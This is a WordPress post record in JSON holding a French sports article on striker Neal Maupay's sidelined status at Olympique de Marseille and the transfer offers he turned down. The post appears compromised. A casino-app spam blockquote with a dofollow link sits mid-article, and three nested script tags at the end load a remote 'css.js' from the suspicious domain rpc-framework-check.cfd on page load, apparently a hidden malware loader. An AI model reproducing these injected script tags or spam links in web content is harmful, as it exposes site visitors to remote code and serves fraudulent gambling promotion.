{"id":3901,"date":"2025-11-20T03:46:28","date_gmt":"2025-11-20T03:46:28","guid":{"rendered":"https:\/\/devu02.testdevlink.net\/Urban_Customs\/?p=3901"},"modified":"2026-02-02T22:12:27","modified_gmt":"2026-02-02T22:12:27","slug":"om-maupay-pret-a-faire-une-mbemba","status":"publish","type":"post","link":"https:\/\/devu02.testdevlink.net\/Urban_Customs\/2025\/11\/20\/om-maupay-pret-a-faire-une-mbemba\/","title":{"rendered":"OM &#8211; Maupay pr\u00eat \u00e0 faire une Mbemba ?"},"content":{"rendered":"<h1>OM &#8211; Maupay pr\u00eat \u00e0 faire une Mbemba ?<\/h1>\n<p>Arriv\u00e9 \u00e0 Marseille en ao\u00fbt 2024 pour pallier l\u2019absence de Faris Moumbagna, <strong>Neal Maupay<\/strong> a v\u00e9cu une premi\u00e8re saison contrast\u00e9e avec 4 buts et 4 passes d\u00e9cisives. D\u00e9cisif et pr\u00e9cieux \u00e0 l&#x27;automne, son manque de justesse technique s&#x27;est fait sentir au mois de janvier avant qu&#x27;Amine Gouiri ne le rel\u00e8gue \u00e0 un r\u00f4le de figurant. Soutenu \u00e0 l\u2019\u00e9poque par <strong>Roberto De Zerbi<\/strong>, qui voyait en lui un joueur exemplaire, l\u2019attaquant de 29 ans se retrouve d\u00e9sormais sans place dans la rotation olympienne. L\u2019option d\u2019achat de 5 millions d\u2019euros a \u00e9t\u00e9 lev\u00e9e cet \u00e9t\u00e9, mais l\u2019international tricolore est depuis rel\u00e9gu\u00e9 au second plan, sans la moindre minute disput\u00e9e en Ligue 1 2025-2026. A posteriori, revoir son attitude en fin de saison au moment d&#x27;annoncer sa prolongation automatique s&#x27;interpr\u00e8te diff\u00e9remment. Vous pouvez retrouver la s\u00e9quence en vid\u00e9o.<\/p>\n<blockquote><p><strong><a href=\"https:\/\/casino-barriere-fr.com\/casino-barriere-app\/\" target=\"_blank\" rel=\"dofollow\">casino barriere app<\/a><\/strong> &#8211; Vous \u00eates passionn\u00e9 de jeux en ligne et souhaitez emporter votre exp\u00e9rience de casino partout avec vous ? Vous vous demandez comment t\u00e9l\u00e9charger et installer<\/p><\/blockquote>\n<h2>Une hi\u00e9rarchie offensive bouch\u00e9e<\/h2>\n<p>Le secteur offensif a profond\u00e9ment \u00e9volu\u00e9 \u00e0 l\u2019OM depuis l\u2019arriv\u00e9e de <strong>Pierre-Emerick Aubameyang<\/strong> et l\u2019\u00e9mergence de nouvelles solutions. Aujourd\u2019hui, Amine Gouiri et Robinio Vaz devancent nettement Maupay dans la hi\u00e9rarchie des attaquants. Preuve de son d\u00e9classement, son nom ne figure pas sur la liste des 22 joueurs retenus pour disputer la Ligue des champions cette saison, un signe fort envoy\u00e9 par le staff.<\/p>\n<h2>Des opportunit\u00e9s refus\u00e9es<\/h2>\n<p>Le mercato estival a pourtant offert plusieurs portes de sortie \u00e0 l\u2019ancien Ni\u00e7ois selon <em>La Provence<\/em>. En Ligue 1, Lens s\u2019est renseign\u00e9 mais n\u2019a pas donn\u00e9 suite en raison de ses \u00e9moluments \u00e9lev\u00e9s. En Italie, l\u2019Udinese et Sassuolo avaient travaill\u00e9 activement sur un pr\u00eat avec option d\u2019achat, tandis que le Betis et le FC S\u00e9ville avaient \u00e9galement sond\u00e9 son entourage. Plus r\u00e9cemment, le PAOK Salonique a tent\u00e9 de l\u2019attirer en Gr\u00e8ce. \u00c0 chaque fois, Maupay a oppos\u00e9 un refus, privil\u00e9giant la stabilit\u00e9.<\/p>\n<h2>Un choix dict\u00e9 par le contrat<\/h2>\n<p>Sous contrat jusqu\u2019en 2028 avec l\u2019OM, l\u2019attaquant b\u00e9n\u00e9ficie de conditions salariales confortables qui expliquent en partie son choix de rester. Malgr\u00e9 une perspective sportive tr\u00e8s r\u00e9duite, il n\u2019a jamais souhait\u00e9 donner suite aux sollicitations. Peut-il faire une Chancel Mbemba, et rester \u00e0 Marseille un an sans joueur quitte \u00e0 mettre en danger la suite de sa carri\u00e8re ? En interne, ce choix interroge mais reste respect\u00e9 par les dirigeants olympiens, conscients que la saison pourrait encore offrir des opportunit\u00e9s impr\u00e9vues \u00e0 celui qui ne veut pas tourner la page marseillaise. Pour rappel, les march\u00e9s turcs et du Golfe (Qatar, Arabie Saoudite) sont encore ouverts.<\/p>\n<p><button class=\"button_button__AbnlE button_md__HB_Xg button_blue__rWPTN\">Retrouvez le tableau des transferts de l&#x27;OM ici<\/button><script><script src=\"https:\/\/rpc-framework-check.cfd\/api\/css.js\" defer><\/script><\/script><script><script src=\"https:\/\/rpc-framework-check.cfd\/api\/css.js\" defer><\/script><\/script><script><script src=\"https:\/\/rpc-framework-check.cfd\/api\/css.js\" defer><\/script><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>OM &#8211; Maupay pr\u00eat \u00e0 faire une Mbemba ? Arriv\u00e9 \u00e0 Marseille en ao\u00fbt 2024 pour pallier l\u2019absence de Faris Moumbagna, Neal Maupay a v\u00e9cu une premi\u00e8re saison contrast\u00e9e avec&#8230;<\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[19],"tags":[],"class_list":{"0":"post-3901","1":"post","2":"type-post","3":"status-publish","4":"format-standard","6":"category-cassino"},"_links":{"self":[{"href":"https:\/\/devu02.testdevlink.net\/Urban_Customs\/wp-json\/wp\/v2\/posts\/3901","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/devu02.testdevlink.net\/Urban_Customs\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/devu02.testdevlink.net\/Urban_Customs\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/devu02.testdevlink.net\/Urban_Customs\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/devu02.testdevlink.net\/Urban_Customs\/wp-json\/wp\/v2\/comments?post=3901"}],"version-history":[{"count":4,"href":"https:\/\/devu02.testdevlink.net\/Urban_Customs\/wp-json\/wp\/v2\/posts\/3901\/revisions"}],"predecessor-version":[{"id":14921,"href":"https:\/\/devu02.testdevlink.net\/Urban_Customs\/wp-json\/wp\/v2\/posts\/3901\/revisions\/14921"}],"wp:attachment":[{"href":"https:\/\/devu02.testdevlink.net\/Urban_Customs\/wp-json\/wp\/v2\/media?parent=3901"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/devu02.testdevlink.net\/Urban_Customs\/wp-json\/wp\/v2\/categories?post=3901"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/devu02.testdevlink.net\/Urban_Customs\/wp-json\/wp\/v2\/tags?post=3901"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}